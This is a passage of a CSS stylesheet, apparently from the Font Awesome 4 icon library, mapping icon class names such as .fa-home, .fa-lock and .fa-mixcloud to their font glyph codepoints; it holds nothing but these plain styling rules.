  content: "\f00a";
}
.fa-th-list:before {
  content: "\f00b";
}
.fa-check:before {
  content: "\f00c";
}
.fa-remove:before,
.fa-close:before,
.fa-times:before {
  content: "\f00d";
}
.fa-search-plus:before {
  content: "\f00e";
}
.fa-search-minus:before {
  content: "\f010";
}
.fa-power-off:before {
  content: "\f011";
}
.fa-signal:before {
  content: "\f012";
}
.fa-gear:before,
.fa-cog:before {
  content: "\f013";
}
.fa-trash-o:before {
  content: "\f014";
}
.fa-home:before {
  content: "\f015";
}
.fa-file-o:before {
  content: "\f016";
}
.fa-clock-o:before {
  content: "\f017";
}
.fa-road:before {
  content: "\f018";
}
.fa-download:before {
  content: "\f019";
}
.fa-arrow-circle-o-down:before {
  content: "\f01a";
}
.fa-arrow-circle-o-up:before {
  content: "\f01b";
}
.fa-inbox:before {
  content: "\f01c";
}
.fa-play-circle-o:before {
  content: "\f01d";
}
.fa-rotate-right:before,
.fa-repeat:before {
  content: "\f01e";
}
.fa-refresh:before {
  content: "\f021";
}
.fa-list-alt:before {
  content: "\f022";
}
.fa-lock:before {
  content: "\f023";
}
.fa-flag:before {
  content: "\f024";
}
.fa-headphones:before {
  content: "\f025";
}
.fa-volume-off:before {
  content: "\f026";
}
.fa-volume-down:before {
  content: "\f027";
}
.fa-volume-up:before {
  content: "\f028";
}
.fa-qrcode:before {
  content: "\f029";
}
.fa-barcode:before {
  content: "\f02a";
}
.fa-tag:before {
  content: "\f02b";
}
.fa-tags:before {
  content: "\f02c";
}
.fa-book:before {
  content: "\f02d";
}
.fa-bookmark:before {
  content: "\f02e";
}
.fa-print:before {
  content: "\f02f";
}
.fa-camera:before {
  content: "\f030";
}
.fa-font:before {
  content: "\f031";
}
.fa-bold:before {
  content: "\f032";
}
.fa-italic:before {
  content: "\f033";
}
.fa-text-height:before {
  content: "\f034";
}
.fa-text-width:before {
  content: "\f035";
}
.fa-align-left:before {
  content: "\f036";
}
.fa-align-center:before {
  content: "\f037";
}
.fa-align-right:before {
  content: "\f038";
}
.fa-align-justify:before {
  content: "\f039";
}
.fa-list:before {
  content: "\f03a";
}
.fa-dedent:before,
.fa-outdent:before {
  content: "\f03b";
}
.fa-indent:before {
  content: "\f03c";
}
.fa-video-camera:before {
  content: "\f03d";
}
.fa-photo:before,
.fa-image:before,
.fa-picture-o:before {
  content: "\f03e";
}
.fa-pencil:before {
  content: "\f040";
}
.fa-map-marker:before {
  content: "\f041";
}
.fa-adjust:before {
  content: "\f042";
}
.fa-tint:before {
  content: "\f043";
}
.fa-edit:before,
.fa-pencil-square-o:before {
  content: "\f044";
}
.fa-share-square-o:before {
  content: "\f045";
}
.fa-check-square-o:before {
  content: "\f046";
}
.fa-arrows:before {
  content: "\f047";
}
.fa-step-backward:before {
  content: "\f048";
}
.fa-fast-backward:before {
  content: "\f049";
}
.fa-backward:before {
  content: "\f04a";
}
.fa-play:before {
  content: "\f04b";
}
.fa-pause:before {
  content: "\f04c";
}
.fa-stop:before {
  content: "\f04d";
}
.fa-forward:before {
  content: "\f04e";
}
.fa-fast-forward:before {
  content: "\f050";
}
.fa-step-forward:before {
  content: "\f051";
}
.fa-eject:before {
  content: "\f052";
}
.fa-chevron-left:before {
  content: "\f053";
}
.fa-chevron-right:before {
  content: "\f054";
}
.fa-plus-circle:before {
  content: "\f055";
}
.fa-minus-circle:before {
  content: "\f056";
}
.fa-times-circle:before {
  content: "\f057";
}
.fa-check-circle:before {
  content: "\f058";
}
.fa-question-circle:before {
  content: "\f059";
}
.fa-info-circle:before {
  content: "\f05a";
}
.fa-crosshairs:before {
  content: "\f05b";
}
.fa-times-circle-o:before {
  content: "\f05c";
}
.fa-check-circle-o:before {
  content: "\f05d";
}
.fa-ban:before {
  content: "\f05e";
}
.fa-arrow-left:before {
  content: "\f060";
}
.fa-arrow-right:before {
  content: "\f061";
}
.fa-arrow-up:before {
  content: "\f062";
}
.fa-arrow-down:before {
  content: "\f063";
}
.fa-mail-forward:before,
.fa-share:before {
  content: "\f064";
}
.fa-expand:before {
  content: "\f065";
}
.fa-compress:before {
  content: "\f066";
}
.fa-plus:before {
  content: "\f067";
}
.fa-minus:before {
  content: "\f068";
}
.fa-asterisk:before {
  content: "\f069";
}
.fa-exclamation-circle:before {
  content: "\f06a";
}
.fa-gift:before {
  content: "\f06b";
}
.fa-leaf:before {
  content: "\f06c";
}
.fa-fire:before {
  content: "\f06d";
}
.fa-eye:before {
  content: "\f06e";
}
.fa-eye-slash:before {
  content: "\f070";
}
.fa-warning:before,
.fa-exclamation-triangle:before {
  content: "\f071";
}
.fa-plane:before {
  content: "\f072";
}
.fa-calendar:before {
  content: "\f073";
}
.fa-random:before {
  content: "\f074";
}
.fa-comment:before {
  content: "\f075";
}
.fa-magnet:before {
  content: "\f076";
}
.fa-chevron-up:before {
  content: "\f077";
}
.fa-chevron-down:before {
  content: "\f078";
}
.fa-retweet:before {
  content: "\f079";
}
.fa-shopping-cart:before {
  content: "\f07a";
}
.fa-folder:before {
  content: "\f07b";
}
.fa-folder-open:before {
  content: "\f07c";
}
.fa-arrows-v:before {
  content: "\f07d";
}
.fa-arrows-h:before {
  content: "\f07e";
}
.fa-bar-chart-o:before,
.fa-bar-chart:before {
  content: "\f080";
}
.fa-twitter-square:before {
  content: "\f081";
}
.fa-facebook-square:before {
  content: "\f082";
}
.fa-camera-retro:before {
  content: "\f083";
}
.fa-key:before {
  content: "\f084";
}
.fa-gears:before,
.fa-cogs:before {
  content: "\f085";
}
.fa-comments:before {
  content: "\f086";
}
.fa-thumbs-o-up:before {
  content: "\f087";
}
.fa-thumbs-o-down:before {
  content: "\f088";
}
.fa-star-half:before {
  content: "\f089";
}
.fa-heart-o:before {
  content: "\f08a";
}
.fa-sign-out:before {
  content: "\f08b";
}
.fa-linkedin-square:before {
  content: "\f08c";
}
.fa-thumb-tack:before {
  content: "\f08d";
}
.fa-external-link:before {
  content: "\f08e";
}
.fa-sign-in:before {
  content: "\f090";
}
.fa-trophy:before {
  content: "\f091";
}
.fa-github-square:before {
  content: "\f092";
}
.fa-upload:before {
  content: "\f093";
}
.fa-lemon-o:before {
  content: "\f094";
}
.fa-phone:before {
  content: "\f095";
}
.fa-square-o:before {
  content: "\f096";
}
.fa-bookmark-o:before {
  content: "\f097";
}
.fa-phone-square:before {
  content: "\f098";
}
.fa-twitter:before {
  content: "\f099";
}
.fa-facebook-f:before,
.fa-facebook:before {
  content: "\f09a";
}
.fa-github:before {
  content: "\f09b";
}
.fa-unlock:before {
  content: "\f09c";
}
.fa-credit-card:before {
  content: "\f09d";
}
.fa-feed:before,
.fa-rss:before {
  content: "\f09e";
}
.fa-hdd-o:before {
  content: "\f0a0";
}
.fa-bullhorn:before {
  content: "\f0a1";
}
.fa-bell:before {
  content: "\f0f3";
}
.fa-certificate:before {
  content: "\f0a3";
}
.fa-hand-o-right:before {
  content: "\f0a4";
}
.fa-hand-o-left:before {
  content: "\f0a5";
}
.fa-hand-o-up:before {
  content: "\f0a6";
}
.fa-hand-o-down:before {
  content: "\f0a7";
}
.fa-arrow-circle-left:before {
  content: "\f0a8";
}
.fa-arrow-circle-right:before {
  content: "\f0a9";
}
.fa-arrow-circle-up:before {
  content: "\f0aa";
}
.fa-arrow-circle-down:before {
  content: "\f0ab";
}
.fa-globe:before {
  content: "\f0ac";
}
.fa-wrench:before {
  content: "\f0ad";
}
.fa-tasks:before {
  content: "\f0ae";
}
.fa-filter:before {
  content: "\f0b0";
}
.fa-briefcase:before {
  content: "\f0b1";
}
.fa-arrows-alt:before {
  content: "\f0b2";
}
.fa-group:before,
.fa-users:before {
  content: "\f0c0";
}
.fa-chain:before,
.fa-link:before {
  content: "\f0c1";
}
.fa-cloud:before {
  content: "\f0c2";
}
.fa-flask:before {
  content: "\f0c3";
}
.fa-cut:before,
.fa-scissors:before {
  content: "\f0c4";
}
.fa-copy:before,
.fa-files-o:before {
  content: "\f0c5";
}
.fa-paperclip:before {
  content: "\f0c6";
}
.fa-save:before,
.fa-floppy-o:before {
  content: "\f0c7";
}
.fa-square:before {
  content: "\f0c8";
}
.fa-navicon:before,
.fa-reorder:before,
.fa-bars:before {
  content: "\f0c9";
}
.fa-list-ul:before {
  content: "\f0ca";
}
.fa-list-ol:before {
  content: "\f0cb";
}
.fa-strikethrough:before {
  content: "\f0cc";
}
.fa-underline:before {
  content: "\f0cd";
}
.fa-table:before {
  content: "\f0ce";
}
.fa-magic:before {
  content: "\f0d0";
}
.fa-truck:before {
  content: "\f0d1";
}
.fa-pinterest:before {
  content: "\f0d2";
}
.fa-pinterest-square:before {
  content: "\f0d3";
}
.fa-google-plus-square:before {
  content: "\f0d4";
}
.fa-google-plus:before {
  content: "\f0d5";
}
.fa-money:before {
  content: "\f0d6";
}
.fa-caret-down:before {
  content: "\f0d7";
}
.fa-caret-up:before {
  content: "\f0d8";
}
.fa-caret-left:before {
  content: "\f0d9";
}
.fa-caret-right:before {
  content: "\f0da";
}
.fa-columns:before {
  content: "\f0db";
}
.fa-unsorted:before,
.fa-sort:before {
  content: "\f0dc";
}
.fa-sort-down:before,
.fa-sort-desc:before {
  content: "\f0dd";
}
.fa-sort-up:before,
.fa-sort-asc:before {
  content: "\f0de";
}
.fa-envelope:before {
  content: "\f0e0";
}
.fa-linkedin:before {
  content: "\f0e1";
}
.fa-rotate-left:before,
.fa-undo:before {
  content: "\f0e2";
}
.fa-legal:before,
.fa-gavel:before {
  content: "\f0e3";
}
.fa-dashboard:before,
.fa-tachometer:before {
  content: "\f0e4";
}
.fa-comment-o:before {
  content: "\f0e5";
}
.fa-comments-o:before {
  content: "\f0e6";
}
.fa-flash:before,
.fa-bolt:before {
  content: "\f0e7";
}
.fa-sitemap:before {
  content: "\f0e8";
}
.fa-umbrella:before {
  content: "\f0e9";
}
.fa-paste:before,
.fa-clipboard:before {
  content: "\f0ea";
}
.fa-lightbulb-o:before {
  content: "\f0eb";
}
.fa-exchange:before {
  content: "\f0ec";
}
.fa-cloud-download:before {
  content: "\f0ed";
}
.fa-cloud-upload:before {
  content: "\f0ee";
}
.fa-user-md:before {
  content: "\f0f0";
}
.fa-stethoscope:before {
  content: "\f0f1";
}
.fa-suitcase:before {
  content: "\f0f2";
}
.fa-bell-o:before {
  content: "\f0a2";
}
.fa-coffee:before {
  content: "\f0f4";
}
.fa-cutlery:before {
  content: "\f0f5";
}
.fa-file-text-o:before {
  content: "\f0f6";
}
.fa-building-o:before {
  content: "\f0f7";
}
.fa-hospital-o:before {
  content: "\f0f8";
}
.fa-ambulance:before {
  content: "\f0f9";
}
.fa-medkit:before {
  content: "\f0fa";
}
.fa-fighter-jet:before {
  content: "\f0fb";
}
.fa-beer:before {
  content: "\f0fc";
}
.fa-h-square:before {
  content: "\f0fd";
}
.fa-plus-square:before {
  content: "\f0fe";
}
.fa-angle-double-left:before {
  content: "\f100";
}
.fa-angle-double-right:before {
  content: "\f101";
}
.fa-angle-double-up:before {
  content: "\f102";
}
.fa-angle-double-down:before {
  content: "\f103";
}
.fa-angle-left:before {
  content: "\f104";
}
.fa-angle-right:before {
  content: "\f105";
}
.fa-angle-up:before {
  content: "\f106";
}
.fa-angle-down:before {
  content: "\f107";
}
.fa-desktop:before {
  content: "\f108";
}
.fa-laptop:before {
  content: "\f109";
}
.fa-tablet:before {
  content: "\f10a";
}
.fa-mobile-phone:before,
.fa-mobile:before {
  content: "\f10b";
}
.fa-circle-o:before {
  content: "\f10c";
}
.fa-quote-left:before {
  content: "\f10d";
}
.fa-quote-right:before {
  content: "\f10e";
}
.fa-spinner:before {
  content: "\f110";
}
.fa-circle:before {
  content: "\f111";
}
.fa-mail-reply:before,
.fa-reply:before {
  content: "\f112";
}
.fa-github-alt:before {
  content: "\f113";
}
.fa-folder-o:before {
  content: "\f114";
}
.fa-folder-open-o:before {
  content: "\f115";
}
.fa-smile-o:before {
  content: "\f118";
}
.fa-frown-o:before {
  content: "\f119";
}
.fa-meh-o:before {
  content: "\f11a";
}
.fa-gamepad:before {
  content: "\f11b";
}
.fa-keyboard-o:before {
  content: "\f11c";
}
.fa-flag-o:before {
  content: "\f11d";
}
.fa-flag-checkered:before {
  content: "\f11e";
}
.fa-terminal:before {
  content: "\f120";
}
.fa-code:before {
  content: "\f121";
}
.fa-mail-reply-all:before,
.fa-reply-all:before {
  content: "\f122";
}
.fa-star-half-empty:before,
.fa-star-half-full:before,
.fa-star-half-o:before {
  content: "\f123";
}
.fa-location-arrow:before {
  content: "\f124";
}
.fa-crop:before {
  content: "\f125";
}
.fa-code-fork:before {
  content: "\f126";
}
.fa-unlink:before,
.fa-chain-broken:before {
  content: "\f127";
}
.fa-question:before {
  content: "\f128";
}
.fa-info:before {
  content: "\f129";
}
.fa-exclamation:before {
  content: "\f12a";
}
.fa-superscript:before {
  content: "\f12b";
}
.fa-subscript:before {
  content: "\f12c";
}
.fa-eraser:before {
  content: "\f12d";
}
.fa-puzzle-piece:before {
  content: "\f12e";
}
.fa-microphone:before {
  content: "\f130";
}
.fa-microphone-slash:before {
  content: "\f131";
}
.fa-shield:before {
  content: "\f132";
}
.fa-calendar-o:before {
  content: "\f133";
}
.fa-fire-extinguisher:before {
  content: "\f134";
}
.fa-rocket:before {
  content: "\f135";
}
.fa-maxcdn:before {
  content: "\f136";
}
.fa-chevron-circle-left:before {
  content: "\f137";
}
.fa-chevron-circle-right:before {
  content: "\f138";
}
.fa-chevron-circle-up:before {
  content: "\f139";
}
.fa-chevron-circle-down:before {
  content: "\f13a";
}
.fa-html5:before {
  content: "\f13b";
}
.fa-css3:before {
  content: "\f13c";
}
.fa-anchor:before {
  content: "\f13d";
}
.fa-unlock-alt:before {
  content: "\f13e";
}
.fa-bullseye:before {
  content: "\f140";
}
.fa-ellipsis-h:before {
  content: "\f141";
}
.fa-ellipsis-v:before {
  content: "\f142";
}
.fa-rss-square:before {
  content: "\f143";
}
.fa-play-circle:before {
  content: "\f144";
}
.fa-ticket:before {
  content: "\f145";
}
.fa-minus-square:before {
  content: "\f146";
}
.fa-minus-square-o:before {
  content: "\f147";
}
.fa-level-up:before {
  content: "\f148";
}
.fa-level-down:before {
  content: "\f149";
}
.fa-check-square:before {
  content: "\f14a";
}
.fa-pencil-square:before {
  content: "\f14b";
}
.fa-external-link-square:before {
  content: "\f14c";
}
.fa-share-square:before {
  content: "\f14d";
}
.fa-compass:before {
  content: "\f14e";
}
.fa-toggle-down:before,
.fa-caret-square-o-down:before {
  content: "\f150";
}
.fa-toggle-up:before,
.fa-caret-square-o-up:before {
  content: "\f151";
}
.fa-toggle-right:before,
.fa-caret-square-o-right:before {
  content: "\f152";
}
.fa-euro:before,
.fa-eur:before {
  content: "\f153";
}
.fa-gbp:before {
  content: "\f154";
}
.fa-dollar:before,
.fa-usd:before {
  content: "\f155";
}
.fa-rupee:before,
.fa-inr:before {
  content: "\f156";
}
.fa-cny:before,
.fa-rmb:before,
.fa-yen:before,
.fa-jpy:before {
  content: "\f157";
}
.fa-ruble:before,
.fa-rouble:before,
.fa-rub:before {
  content: "\f158";
}
.fa-won:before,
.fa-krw:before {
  content: "\f159";
}
.fa-bitcoin:before,
.fa-btc:before {
  content: "\f15a";
}
.fa-file:before {
  content: "\f15b";
}
.fa-file-text:before {
  content: "\f15c";
}
.fa-sort-alpha-asc:before {
  content: "\f15d";
}
.fa-sort-alpha-desc:before {
  content: "\f15e";
}
.fa-sort-amount-asc:before {
  content: "\f160";
}
.fa-sort-amount-desc:before {
  content: "\f161";
}
.fa-sort-numeric-asc:before {
  content: "\f162";
}
.fa-sort-numeric-desc:before {
  content: "\f163";
}
.fa-thumbs-up:before {
  content: "\f164";
}
.fa-thumbs-down:before {
  content: "\f165";
}
.fa-youtube-square:before {
  content: "\f166";
}
.fa-youtube:before {
  content: "\f167";
}
.fa-xing:before {
  content: "\f168";
}
.fa-xing-square:before {
  content: "\f169";
}
.fa-youtube-play:before {
  content: "\f16a";
}
.fa-dropbox:before {
  content: "\f16b";
}
.fa-stack-overflow:before {
  content: "\f16c";
}
.fa-instagram:before {
  content: "\f16d";
}
.fa-flickr:before {
  content: "\f16e";
}
.fa-adn:before {
  content: "\f170";
}
.fa-bitbucket:before {
  content: "\f171";
}
.fa-bitbucket-square:before {
  content: "\f172";
}
.fa-tumblr:before {
  content: "\f173";
}
.fa-tumblr-square:before {
  content: "\f174";
}
.fa-long-arrow-down:before {
  content: "\f175";
}
.fa-long-arrow-up:before {
  content: "\f176";
}
.fa-long-arrow-left:before {
  content: "\f177";
}
.fa-long-arrow-right:before {
  content: "\f178";
}
.fa-apple:before {
  content: "\f179";
}
.fa-windows:before {
  content: "\f17a";
}
.fa-android:before {
  content: "\f17b";
}
.fa-linux:before {
  content: "\f17c";
}
.fa-dribbble:before {
  content: "\f17d";
}
.fa-skype:before {
  content: "\f17e";
}
.fa-foursquare:before {
  content: "\f180";
}
.fa-trello:before {
  content: "\f181";
}
.fa-female:before {
  content: "\f182";
}
.fa-male:before {
  content: "\f183";
}
.fa-gittip:before,
.fa-gratipay:before {
  content: "\f184";
}
.fa-sun-o:before {
  content: "\f185";
}
.fa-moon-o:before {
  content: "\f186";
}
.fa-archive:before {
  content: "\f187";
}
.fa-bug:before {
  content: "\f188";
}
.fa-vk:before {
  content: "\f189";
}
.fa-weibo:before {
  content: "\f18a";
}
.fa-renren:before {
  content: "\f18b";
}
.fa-pagelines:before {
  content: "\f18c";
}
.fa-stack-exchange:before {
  content: "\f18d";
}
.fa-arrow-circle-o-right:before {
  content: "\f18e";
}
.fa-arrow-circle-o-left:before {
  content: "\f190";
}
.fa-toggle-left:before,
.fa-caret-square-o-left:before {
  content: "\f191";
}
.fa-dot-circle-o:before {
  content: "\f192";
}
.fa-wheelchair:before {
  content: "\f193";
}
.fa-vimeo-square:before {
  content: "\f194";
}
.fa-turkish-lira:before,
.fa-try:before {
  content: "\f195";
}
.fa-plus-square-o:before {
  content: "\f196";
}
.fa-space-shuttle:before {
  content: "\f197";
}
.fa-slack:before {
  content: "\f198";
}
.fa-envelope-square:before {
  content: "\f199";
}
.fa-wordpress:before {
  content: "\f19a";
}
.fa-openid:before {
  content: "\f19b";
}
.fa-institution:before,
.fa-bank:before,
.fa-university:before {
  content: "\f19c";
}
.fa-mortar-board:before,
.fa-graduation-cap:before {
  content: "\f19d";
}
.fa-yahoo:before {
  content: "\f19e";
}
.fa-google:before {
  content: "\f1a0";
}
.fa-reddit:before {
  content: "\f1a1";
}
.fa-reddit-square:before {
  content: "\f1a2";
}
.fa-stumbleupon-circle:before {
  content: "\f1a3";
}
.fa-stumbleupon:before {
  content: "\f1a4";
}
.fa-delicious:before {
  content: "\f1a5";
}
.fa-digg:before {
  content: "\f1a6";
}
.fa-pied-piper-pp:before {
  content: "\f1a7";
}
.fa-pied-piper-alt:before {
  content: "\f1a8";
}
.fa-drupal:before {
  content: "\f1a9";
}
.fa-joomla:before {
  content: "\f1aa";
}
.fa-language:before {
  content: "\f1ab";
}
.fa-fax:before {
  content: "\f1ac";
}
.fa-building:before {
  content: "\f1ad";
}
.fa-child:before {
  content: "\f1ae";
}
.fa-paw:before {
  content: "\f1b0";
}
.fa-spoon:before {
  content: "\f1b1";
}
.fa-cube:before {
  content: "\f1b2";
}
.fa-cubes:before {
  content: "\f1b3";
}
.fa-behance:before {
  content: "\f1b4";
}
.fa-behance-square:before {
  content: "\f1b5";
}
.fa-steam:before {
  content: "\f1b6";
}
.fa-steam-square:before {
  content: "\f1b7";
}
.fa-recycle:before {
  content: "\f1b8";
}
.fa-automobile:before,
.fa-car:before {
  content: "\f1b9";
}
.fa-cab:before,
.fa-taxi:before {
  content: "\f1ba";
}
.fa-tree:before {
  content: "\f1bb";
}
.fa-spotify:before {
  content: "\f1bc";
}
.fa-deviantart:before {
  content: "\f1bd";
}
.fa-soundcloud:before {
  content: "\f1be";
}
.fa-database:before {
  content: "\f1c0";
}
.fa-file-pdf-o:before {
  content: "\f1c1";
}
.fa-file-word-o:before {
  content: "\f1c2";
}
.fa-file-excel-o:before {
  content: "\f1c3";
}
.fa-file-powerpoint-o:before {
  content: "\f1c4";
}
.fa-file-photo-o:before,
.fa-file-picture-o:before,
.fa-file-image-o:before {
  content: "\f1c5";
}
.fa-file-zip-o:before,
.fa-file-archive-o:before {
  content: "\f1c6";
}
.fa-file-sound-o:before,
.fa-file-audio-o:before {
  content: "\f1c7";
}
.fa-file-movie-o:before,
.fa-file-video-o:before {
  content: "\f1c8";
}
.fa-file-code-o:before {
  content: "\f1c9";
}
.fa-vine:before {
  content: "\f1ca";
}
.fa-codepen:before {
  content: "\f1cb";
}
.fa-jsfiddle:before {
  content: "\f1cc";
}
.fa-life-bouy:before,
.fa-life-buoy:before,
.fa-life-saver:before,
.fa-support:before,
.fa-life-ring:before {
  content: "\f1cd";
}
.fa-circle-o-notch:before {
  content: "\f1ce";
}
.fa-ra:before,
.fa-resistance:before,
.fa-rebel:before {
  content: "\f1d0";
}
.fa-ge:before,
.fa-empire:before {
  content: "\f1d1";
}
.fa-git-square:before {
  content: "\f1d2";
}
.fa-git:before {
  content: "\f1d3";
}
.fa-y-combinator-square:before,
.fa-yc-square:before,
.fa-hacker-news:before {
  content: "\f1d4";
}
.fa-tencent-weibo:before {
  content: "\f1d5";
}
.fa-qq:before {
  content: "\f1d6";
}
.fa-wechat:before,
.fa-weixin:before {
  content: "\f1d7";
}
.fa-send:before,
.fa-paper-plane:before {
  content: "\f1d8";
}
.fa-send-o:before,
.fa-paper-plane-o:before {
  content: "\f1d9";
}
.fa-history:before {
  content: "\f1da";
}
.fa-circle-thin:before {
  content: "\f1db";
}
.fa-header:before {
  content: "\f1dc";
}
.fa-paragraph:before {
  content: "\f1dd";
}
.fa-sliders:before {
  content: "\f1de";
}
.fa-share-alt:before {
  content: "\f1e0";
}
.fa-share-alt-square:before {
  content: "\f1e1";
}
.fa-bomb:before {
  content: "\f1e2";
}
.fa-soccer-ball-o:before,
.fa-futbol-o:before {
  content: "\f1e3";
}
.fa-tty:before {
  content: "\f1e4";
}
.fa-binoculars:before {
  content: "\f1e5";
}
.fa-plug:before {
  content: "\f1e6";
}
.fa-slideshare:before {
  content: "\f1e7";
}
.fa-twitch:before {
  content: "\f1e8";
}
.fa-yelp:before {
  content: "\f1e9";
}
.fa-newspaper-o:before {
  content: "\f1ea";
}
.fa-wifi:before {
  content: "\f1eb";
}
.fa-calculator:before {
  content: "\f1ec";
}
.fa-paypal:before {
  content: "\f1ed";
}
.fa-google-wallet:before {
  content: "\f1ee";
}
.fa-cc-visa:before {
  content: "\f1f0";
}
.fa-cc-mastercard:before {
  content: "\f1f1";
}
.fa-cc-discover:before {
  content: "\f1f2";
}
.fa-cc-amex:before {
  content: "\f1f3";
}
.fa-cc-paypal:before {
  content: "\f1f4";
}
.fa-cc-stripe:before {
  content: "\f1f5";
}
.fa-bell-slash:before {
  content: "\f1f6";
}
.fa-bell-slash-o:before {
  content: "\f1f7";
}
.fa-trash:before {
  content: "\f1f8";
}
.fa-copyright:before {
  content: "\f1f9";
}
.fa-at:before {
  content: "\f1fa";
}
.fa-eyedropper:before {
  content: "\f1fb";
}
.fa-paint-brush:before {
  content: "\f1fc";
}
.fa-birthday-cake:before {
  content: "\f1fd";
}
.fa-area-chart:before {
  content: "\f1fe";
}
.fa-pie-chart:before {
  content: "\f200";
}
.fa-line-chart:before {
  content: "\f201";
}
.fa-lastfm:before {
  content: "\f202";
}
.fa-lastfm-square:before {
  content: "\f203";
}
.fa-toggle-off:before {
  content: "\f204";
}
.fa-toggle-on:before {
  content: "\f205";
}
.fa-bicycle:before {
  content: "\f206";
}
.fa-bus:before {
  content: "\f207";
}
.fa-ioxhost:before {
  content: "\f208";
}
.fa-angellist:before {
  content: "\f209";
}
.fa-cc:before {
  content: "\f20a";
}
.fa-shekel:before,
.fa-sheqel:before,
.fa-ils:before {
  content: "\f20b";
}
.fa-meanpath:before {
  content: "\f20c";
}
.fa-buysellads:before {
  content: "\f20d";
}
.fa-connectdevelop:before {
  content: "\f20e";
}
.fa-dashcube:before {
  content: "\f210";
}
.fa-forumbee:before {
  content: "\f211";
}
.fa-leanpub:before {
  content: "\f212";
}
.fa-sellsy:before {
  content: "\f213";
}
.fa-shirtsinbulk:before {
  content: "\f214";
}
.fa-simplybuilt:before {
  content: "\f215";
}
.fa-skyatlas:before {
  content: "\f216";
}
.fa-cart-plus:before {
  content: "\f217";
}
.fa-cart-arrow-down:before {
  content: "\f218";
}
.fa-diamond:before {
  content: "\f219";
}
.fa-ship:before {
  content: "\f21a";
}
.fa-user-secret:before {
  content: "\f21b";
}
.fa-motorcycle:before {
  content: "\f21c";
}
.fa-street-view:before {
  content: "\f21d";
}
.fa-heartbeat:before {
  content: "\f21e";
}
.fa-venus:before {
  content: "\f221";
}
.fa-mars:before {
  content: "\f222";
}
.fa-mercury:before {
  content: "\f223";
}
.fa-intersex:before,
.fa-transgender:before {
  content: "\f224";
}
.fa-transgender-alt:before {
  content: "\f225";
}
.fa-venus-double:before {
  content: "\f226";
}
.fa-mars-double:before {
  content: "\f227";
}
.fa-venus-mars:before {
  content: "\f228";
}
.fa-mars-stroke:before {
  content: "\f229";
}
.fa-mars-stroke-v:before {
  content: "\f22a";
}
.fa-mars-stroke-h:before {
  content: "\f22b";
}
.fa-neuter:before {
  content: "\f22c";
}
.fa-genderless:before {
  content: "\f22d";
}
.fa-facebook-official:before {
  content: "\f230";
}
.fa-pinterest-p:before {
  content: "\f231";
}
.fa-whatsapp:before {
  content: "\f232";
}
.fa-server:before {
  content: "\f233";
}
.fa-user-plus:before {
  content: "\f234";
}
.fa-user-times:before {
  content: "\f235";
}
.fa-hotel:before,
.fa-bed:before {
  content: "\f236";
}
.fa-viacoin:before {
  content: "\f237";
}
.fa-train:before {
  content: "\f238";
}
.fa-subway:before {
  content: "\f239";
}
.fa-medium:before {
  content: "\f23a";
}
.fa-yc:before,
.fa-y-combinator:before {
  content: "\f23b";
}
.fa-optin-monster:before {
  content: "\f23c";
}
.fa-opencart:before {
  content: "\f23d";
}
.fa-expeditedssl:before {
  content: "\f23e";
}
.fa-battery-4:before,
.fa-battery:before,
.fa-battery-full:before {
  content: "\f240";
}
.fa-battery-3:before,
.fa-battery-three-quarters:before {
  content: "\f241";
}
.fa-battery-2:before,
.fa-battery-half:before {
  content: "\f242";
}
.fa-battery-1:before,
.fa-battery-quarter:before {
  content: "\f243";
}
.fa-battery-0:before,
.fa-battery-empty:before {
  content: "\f244";
}
.fa-mouse-pointer:before {
  content: "\f245";
}
.fa-i-cursor:before {
  content: "\f246";
}
.fa-object-group:before {
  content: "\f247";
}
.fa-object-ungroup:before {
  content: "\f248";
}
.fa-sticky-note:before {
  content: "\f249";
}
.fa-sticky-note-o:before {
  content: "\f24a";
}
.fa-cc-jcb:before {
  content: "\f24b";
}
.fa-cc-diners-club:before {
  content: "\f24c";
}
.fa-clone:before {
  content: "\f24d";
}
.fa-balance-scale:before {
  content: "\f24e";
}
.fa-hourglass-o:before {
  content: "\f250";
}
.fa-hourglass-1:before,
.fa-hourglass-start:before {
  content: "\f251";
}
.fa-hourglass-2:before,
.fa-hourglass-half:before {
  content: "\f252";
}
.fa-hourglass-3:before,
.fa-hourglass-end:before {
  content: "\f253";
}
.fa-hourglass:before {
  content: "\f254";
}
.fa-hand-grab-o:before,
.fa-hand-rock-o:before {
  content: "\f255";
}
.fa-hand-stop-o:before,
.fa-hand-paper-o:before {
  content: "\f256";
}
.fa-hand-scissors-o:before {
  content: "\f257";
}
.fa-hand-lizard-o:before {
  content: "\f258";
}
.fa-hand-spock-o:before {
  content: "\f259";
}
.fa-hand-pointer-o:before {
  content: "\f25a";
}
.fa-hand-peace-o:before {
  content: "\f25b";
}
.fa-trademark:before {
  content: "\f25c";
}
.fa-registered:before {
  content: "\f25d";
}
.fa-creative-commons:before {
  content: "\f25e";
}
.fa-gg:before {
  content: "\f260";
}
.fa-gg-circle:before {
  content: "\f261";
}
.fa-tripadvisor:before {
  content: "\f262";
}
.fa-odnoklassniki:before {
  content: "\f263";
}
.fa-odnoklassniki-square:before {
  content: "\f264";
}
.fa-get-pocket:before {
  content: "\f265";
}
.fa-wikipedia-w:before {
  content: "\f266";
}
.fa-safari:before {
  content: "\f267";
}
.fa-chrome:before {
  content: "\f268";
}
.fa-firefox:before {
  content: "\f269";
}
.fa-opera:before {
  content: "\f26a";
}
.fa-internet-explorer:before {
  content: "\f26b";
}
.fa-tv:before,
.fa-television:before {
  content: "\f26c";
}
.fa-contao:before {
  content: "\f26d";
}
.fa-500px:before {
  content: "\f26e";
}
.fa-amazon:before {
  content: "\f270";
}
.fa-calendar-plus-o:before {
  content: "\f271";
}
.fa-calendar-minus-o:before {
  content: "\f272";
}
.fa-calendar-times-o:before {
  content: "\f273";
}
.fa-calendar-check-o:before {
  content: "\f274";
}
.fa-industry:before {
  content: "\f275";
}
.fa-map-pin:before {
  content: "\f276";
}
.fa-map-signs:before {
  content: "\f277";
}
.fa-map-o:before {
  content: "\f278";
}
.fa-map:before {
  content: "\f279";
}
.fa-commenting:before {
  content: "\f27a";
}
.fa-commenting-o:before {
  content: "\f27b";
}
.fa-houzz:before {
  content: "\f27c";
}
.fa-vimeo:before {
  content: "\f27d";
}
.fa-black-tie:before {
  content: "\f27e";
}
.fa-fonticons:before {
  content: "\f280";
}
.fa-reddit-alien:before {
  content: "\f281";
}
.fa-edge:before {
  content: "\f282";
}
.fa-credit-card-alt:before {
  content: "\f283";
}
.fa-codiepie:before {
  content: "\f284";
}
.fa-modx:before {
  content: "\f285";
}
.fa-fort-awesome:before {
  content: "\f286";
}
.fa-usb:before {
  content: "\f287";
}
.fa-product-hunt:before {
  content: "\f288";
}
.fa-mixcloud:before {
  content: "\f289";
}
